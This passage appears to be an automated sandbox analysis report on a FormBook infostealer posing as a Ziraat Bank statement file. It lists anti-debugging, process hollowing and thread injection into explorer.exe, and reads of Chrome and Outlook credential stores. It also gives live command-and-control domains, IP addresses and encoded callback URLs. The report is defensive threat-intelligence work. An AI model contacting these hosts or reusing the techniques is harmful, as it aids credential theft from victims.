          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B06DC9 mov eax, dword ptr fs:[00000030h]2_2_00B06DC9
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B58D34 mov eax, dword ptr fs:[00000030h]2_2_00B58D34
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B0A537 mov eax, dword ptr fs:[00000030h]2_2_00B0A537
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AB4D3B mov eax, dword ptr fs:[00000030h]2_2_00AB4D3B
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AB4D3B mov eax, dword ptr fs:[00000030h]2_2_00AB4D3B
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AB4D3B mov eax, dword ptr fs:[00000030h]2_2_00AB4D3B
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A8AD30 mov eax, dword ptr fs:[00000030h]2_2_00A8AD30
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A93D34 mov eax, dword ptr fs:[00000030h]2_2_00A93D34
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A93D34 mov eax, dword ptr fs:[00000030h]2_2_00A93D34
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A93D34 mov eax, dword ptr fs:[00000030h]2_2_00A93D34
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A93D34 mov eax, dword ptr fs:[00000030h]2_2_00A93D34
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A93D34 mov eax, dword ptr fs:[00000030h]2_2_00A93D34
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A93D34 mov eax, dword ptr fs:[00000030h]2_2_00A93D34
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A93D34 mov eax, dword ptr fs:[00000030h]2_2_00A93D34
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A93D34 mov eax, dword ptr fs:[00000030h]2_2_00A93D34
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A93D34 mov eax, dword ptr fs:[00000030h]2_2_00A93D34
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A93D34 mov eax, dword ptr fs:[00000030h]2_2_00A93D34
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A93D34 mov eax, dword ptr fs:[00000030h]2_2_00A93D34
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A93D34 mov eax, dword ptr fs:[00000030h]2_2_00A93D34
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A93D34 mov eax, dword ptr fs:[00000030h]2_2_00A93D34
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AAC577 mov eax, dword ptr fs:[00000030h]2_2_00AAC577
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AAC577 mov eax, dword ptr fs:[00000030h]2_2_00AAC577
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AC3D43 mov eax, dword ptr fs:[00000030h]2_2_00AC3D43
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B03540 mov eax, dword ptr fs:[00000030h]2_2_00B03540
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AA7D50 mov eax, dword ptr fs:[00000030h]2_2_00AA7D50
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B50EA5 mov eax, dword ptr fs:[00000030h]2_2_00B50EA5
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B50EA5 mov eax, dword ptr fs:[00000030h]2_2_00B50EA5
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B50EA5 mov eax, dword ptr fs:[00000030h]2_2_00B50EA5
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B046A7 mov eax, dword ptr fs:[00000030h]2_2_00B046A7
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B1FE87 mov eax, dword ptr fs:[00000030h]2_2_00B1FE87
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AB16E0 mov ecx, dword ptr fs:[00000030h]2_2_00AB16E0
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A976E2 mov eax, dword ptr fs:[00000030h]2_2_00A976E2
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B58ED6 mov eax, dword ptr fs:[00000030h]2_2_00B58ED6
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AB36CC mov eax, dword ptr fs:[00000030h]2_2_00AB36CC
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AC8EC7 mov eax, dword ptr fs:[00000030h]2_2_00AC8EC7
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B3FEC0 mov eax, dword ptr fs:[00000030h]2_2_00B3FEC0
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A8E620 mov eax, dword ptr fs:[00000030h]2_2_00A8E620
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B3FE3F mov eax, dword ptr fs:[00000030h]2_2_00B3FE3F
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A8C600 mov eax, dword ptr fs:[00000030h]2_2_00A8C600
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A8C600 mov eax, dword ptr fs:[00000030h]2_2_00A8C600
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A8C600 mov eax, dword ptr fs:[00000030h]2_2_00A8C600
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AB8E00 mov eax, dword ptr fs:[00000030h]2_2_00AB8E00
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00ABA61C mov eax, dword ptr fs:[00000030h]2_2_00ABA61C
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00ABA61C mov eax, dword ptr fs:[00000030h]2_2_00ABA61C
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B41608 mov eax, dword ptr fs:[00000030h]2_2_00B41608
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A9766D mov eax, dword ptr fs:[00000030h]2_2_00A9766D
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AAAE73 mov eax, dword ptr fs:[00000030h]2_2_00AAAE73
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AAAE73 mov eax, dword ptr fs:[00000030h]2_2_00AAAE73
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AAAE73 mov eax, dword ptr fs:[00000030h]2_2_00AAAE73
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AAAE73 mov eax, dword ptr fs:[00000030h]2_2_00AAAE73
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AAAE73 mov eax, dword ptr fs:[00000030h]2_2_00AAAE73
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A97E41 mov eax, dword ptr fs:[00000030h]2_2_00A97E41
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A97E41 mov eax, dword ptr fs:[00000030h]2_2_00A97E41
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A97E41 mov eax, dword ptr fs:[00000030h]2_2_00A97E41
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A97E41 mov eax, dword ptr fs:[00000030h]2_2_00A97E41
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A97E41 mov eax, dword ptr fs:[00000030h]2_2_00A97E41
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A97E41 mov eax, dword ptr fs:[00000030h]2_2_00A97E41
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B07794 mov eax, dword ptr fs:[00000030h]2_2_00B07794
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B07794 mov eax, dword ptr fs:[00000030h]2_2_00B07794
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B07794 mov eax, dword ptr fs:[00000030h]2_2_00B07794
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A98794 mov eax, dword ptr fs:[00000030h]2_2_00A98794
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AC37F5 mov eax, dword ptr fs:[00000030h]2_2_00AC37F5
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A84F2E mov eax, dword ptr fs:[00000030h]2_2_00A84F2E
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A84F2E mov eax, dword ptr fs:[00000030h]2_2_00A84F2E
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00ABE730 mov eax, dword ptr fs:[00000030h]2_2_00ABE730
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B1FF10 mov eax, dword ptr fs:[00000030h]2_2_00B1FF10
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B1FF10 mov eax, dword ptr fs:[00000030h]2_2_00B1FF10
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00ABA70E mov eax, dword ptr fs:[00000030h]2_2_00ABA70E
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00ABA70E mov eax, dword ptr fs:[00000030h]2_2_00ABA70E
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B5070D mov eax, dword ptr fs:[00000030h]2_2_00B5070D
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B5070D mov eax, dword ptr fs:[00000030h]2_2_00B5070D
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00AAF716 mov eax, dword ptr fs:[00000030h]2_2_00AAF716
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A9FF60 mov eax, dword ptr fs:[00000030h]2_2_00A9FF60
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00B58F6A mov eax, dword ptr fs:[00000030h]2_2_00B58F6A
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_00A9EF40 mov eax, dword ptr fs:[00000030h]2_2_00A9EF40
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 2_2_0040CF23 LdrLoadDll,2_2_0040CF23
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 1_2_00402EC3 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00402EC3
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 1_2_00405D74 SetUnhandledExceptionFilter,1_2_00405D74
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 1_2_00403D30 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00403D30

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeDomain query: www.genuineinsights.cloud
          Source: C:\Windows\explorer.exeDomain query: www.octohoki.net
          Source: C:\Windows\explorer.exeNetwork Connect: 107.148.8.96 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 194.102.227.30 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.ladybillplanet.com
          Source: C:\Windows\explorer.exeNetwork Connect: 66.160.197.76 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 184.94.215.91 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 66.235.200.146 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 66.96.162.149 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.cutgang.net
          Source: C:\Windows\explorer.exeDomain query: www.energybig.xyz
          Source: C:\Windows\explorer.exeDomain query: www.wenzid4.top
          Sample uses process hollowing technique
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeSection unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: 860000Jump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeSection loaded: unknown target: C:\Users\user\AppData\Local\Temp\tqxwmam.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeThread register set: target process: 3324Jump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeThread register set: target process: 3324Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeProcess created: C:\Users\user\AppData\Local\Temp\tqxwmam.exe C:\Users\user\AppData\Local\Temp\tqxwmam.exeJump to behavior
          Source: explorer.exe, 00000003.00000002.564160955.00000000086B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.537132323.00000000086B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.543355819.00000000086B6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000002.557745459.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.306613550.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: uProgram Manager*r
          Source: explorer.exe, 00000003.00000002.557745459.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.306613550.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000002.557745459.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.306613550.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000003.00000002.557001836.0000000000878000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.306023557.0000000000878000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanLoc*U
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeCode function: 1_2_004069DF GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,1_2_004069DF
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.tqxwmam.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.tqxwmam.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.331233297.00000000005B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.331080035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.556915588.0000000000900000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.557710413.0000000003280000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.557515887.0000000002F80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.331329417.00000000005E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Windows\SysWOW64\cmmon32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Windows\SysWOW64\cmmon32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.tqxwmam.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.tqxwmam.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.331233297.00000000005B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.331080035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.556915588.0000000000900000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.557710413.0000000003280000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.557515887.0000000002F80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.331329417.00000000005E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts2
          Native API          		Path Interception1
          Access Token Manipulation          		1
          Deobfuscate/Decode Files or Information          		1
          OS Credential Dumping          		1
          System Time Discovery          		Remote Services1
          Archive Collected Data          		Exfiltration Over Other Network Medium3
          Ingress Tool Transfer          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          System Shutdown/Reboot
          Default Accounts1
          Shared Modules          		Boot or Logon Initialization Scripts512
          Process Injection          		2
          Obfuscated Files or Information          		1
          Input Capture          		2
          File and Directory Discovery          		Remote Desktop Protocol1
          Data from Local System          		Exfiltration Over Bluetooth1
          Encrypted Channel          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain Accounts2
          Command and Scripting Interpreter          		Logon Script (Windows)Logon Script (Windows)11
          Software Packing          		Security Account Manager5
          System Information Discovery          		SMB/Windows Admin Shares1
          Email Collection          		Automated Exfiltration4
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)2
          Virtualization/Sandbox Evasion          		NTDS251
          Security Software Discovery          		Distributed Component Object Model1
          Input Capture          		Scheduled Transfer14
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Access Token Manipulation          		LSA Secrets2
          Virtualization/Sandbox Evasion          		SSH1
          Clipboard Data          		Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common512
          Process Injection          		Cached Domain Credentials2
          Process Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
          Application Window Discovery          		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
          Remote System Discovery          		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 806923 Sample: T.C.Ziraat Bankasi A.S_Ekst... Startdate: 14/02/2023 Architecture: WINDOWS Score: 100 38 Snort IDS alert for network traffic 2->38 40 Malicious sample detected (through community Yara rule) 2->40 42 Antivirus detection for URL or domain 2->42 44 3 other signatures 2->44 9 T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe 19 2->9         started        process3 file4 26 C:\Users\user\AppData\Local\...\tqxwmam.exe, PE32 9->26 dropped 12 tqxwmam.exe 9->12         started        process5 signatures6 58 Multi AV Scanner detection for dropped file 12->58 60 Detected unpacking (changes PE section rights) 12->60 62 Maps a DLL or memory area into another process 12->62 64 Contains functionality to detect sleep reduction / modifications 12->64 15 tqxwmam.exe 12->15         started        process7 signatures8 66 Modifies the context of a thread in another process (thread injection) 15->66 68 Maps a DLL or memory area into another process 15->68 70 Sample uses process hollowing technique 15->70 72 Queues an APC in another process (thread injection) 15->72 18 explorer.exe 1 15->18 injected process9 dnsIp10 28 www.energybig.xyz 184.94.215.91, 49709, 49710, 80 VXCHNGE-NC01US United States 18->28 30 cutgang.net 194.102.227.30, 80 VODAFONE_ROCharlesdeGaullenr15RO Romania 18->30 32 7 other IPs or domains 18->32 46 System process connects to network (likely due to code injection or exploit) 18->46 48 Performs DNS queries to domains with low reputation 18->48 22 cmmon32.exe 13 18->22         started        signatures11 process12 dnsIp13 34 www.cutgang.net 22->34 36 cutgang.net 22->36 50 Tries to steal Mail credentials (via file / registry access) 22->50 52 Tries to harvest and steal browser information (history, passwords, etc) 22->52 54 Modifies the context of a thread in another process (thread injection) 22->54 56 Maps a DLL or memory area into another process 22->56 signatures14

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe31%ReversingLabsWin32.Trojan.Garf
          T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe44%VirustotalBrowse
          T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\tqxwmam.exe13%ReversingLabs

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          1.2.tqxwmam.exe.620000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          2.2.tqxwmam.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          ladybillplanet.com3%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.searchvity.com/?dn=100%URL Reputationmalware
          http://www.fluxgreenn.space0%Avira URL Cloudsafe
          http://www.nortonseecurity.com/ghii/0%Avira URL Cloudsafe
          http://www.ladybillplanet.com/ghii/?uyr=nNwsU5RDSztrDyxRHILLs79A8ojzBVjbvYOj2DqB/Q3esj8ZmeFlGSz1p8lC+bcuH8jypYjqHnnMah8No3XkProQXaSL0hAuoA==&IlOzNN=EyIBgfI12Z100%Avira URL Cloudmalware
          http://www.ixirwholesale.xyz/ghii/0%Avira URL Cloudsafe
          http://www.searchvity.com/100%URL Reputationmalware
          http://www.de-nagel.com/ghii/0%Avira URL Cloudsafe
          http://www.sem-jobs.com/ghii/0%Avira URL Cloudsafe
          http://www.assilajamiart.com/ghii/0%Avira URL Cloudsafe
          http://www.octohoki.net100%Avira URL Cloudmalware
          http://www.cutgang.net0%Avira URL Cloudsafe
          http://www.octohoki.net/ghii/100%Avira URL Cloudmalware
          http://www.hubyazilim.com/ghii/100%Avira URL Cloudmalware
          http://www.cutgang.net/ghii/0%Avira URL Cloudsafe
          http://www.octohoki.netP70%Avira URL Cloudsafe
          http://www.wenzid4.top0%Avira URL Cloudsafe
          http://www.7dkjhk.com0%Avira URL Cloudsafe
          http://www.energybig.xyz/ghii/100%Avira URL Cloudmalware
          http://www.bemmulher.online/ghii/0%Avira URL Cloudsafe
          http://www.assilajamiart.com0%Avira URL Cloudsafe
          http://www.de-nagel.com0%Avira URL Cloudsafe
          http://www.ladybillplanet.com0%Avira URL Cloudsafe
          http://www.7dkjhk.com/ghii/100%Avira URL Cloudmalware
          http://www.bemmulher.online0%Avira URL Cloudsafe
          http://www.yeah-go.com/ghii/0%Avira URL Cloudsafe
          http://www.sem-jobs.com0%Avira URL Cloudsafe
          http://www.de-nagel.comev0%Avira URL Cloudsafe
          http://www.energybig.xyz100%Avira URL Cloudmalware
          http://www.octohoki.net/ghii/?IlOzNN=EyIBgfI12Z&uyr=mbPzPtZ0Er8L5pad82wwGh9ocqcT3a4VC5lEcjpUbblZCC9rEfNiJ4Zzn4lMJLJJ2TaA1od8FsE8LCEUSFIoVIj1yavarUZuxw==100%Avira URL Cloudmalware
          http://www.genuineinsights.cloud/ghii/100%Avira URL Cloudmalware
          http://www.wenzid4.top40%Avira URL Cloudsafe
          http://www.genuineinsights.cloud100%Avira URL Cloudphishing
          http://www.cutgang.net/ghii/?uyr=ZjEpLe7oxQ70uLnf6hiyuc6pu0EMckSA0PTIEH8mULBl4PD4NIfksCJCZa9jgfqw8h0%Avira URL Cloudsafe
          http://www.wenzid4.top/ghii/?IlOzNN=EyIBgfI12Z&uyr=MOY5/0rZkCSn1x8B5kGxcu4kjN12BC26NMBU4rUAiJ09dU/WDm+Fx0Du9tK3DtQGeLOXEwxSHBLi0tUrRAF3LCH1xNv1NtM5EA==100%Avira URL Cloudmalware
          http://www.ladybillplanet.com/ghii/100%Avira URL Cloudmalware
          http://www.ixirwholesale.xyz0%Avira URL Cloudsafe
          http://www.fluxgreenn.space/ghii/0%Avira URL Cloudsafe
          http://www.genuineinsights.cloud/ghii/?uyr=b9pmEiWE3A9hICRLJ48/0GIWTdcguNEQkRUuEoMGZR2jfpcIS7+82C+h9uoa2hbDMoucG0FStkg6AqIGzw0gyz2/IGepHjywiw==&IlOzNN=EyIBgfI12Z100%Avira URL Cloudmalware
          http://www.wenzid4.top/ghii/100%Avira URL Cloudmalware
          http://ladybillplanet.com/ghii/?uyr=nNwsU5RDSztrDyxRHILLs79A8ojzBVjbvYOj2DqB/Q3esj8ZmeFlGSz1p8lC100%Avira URL Cloudmalware
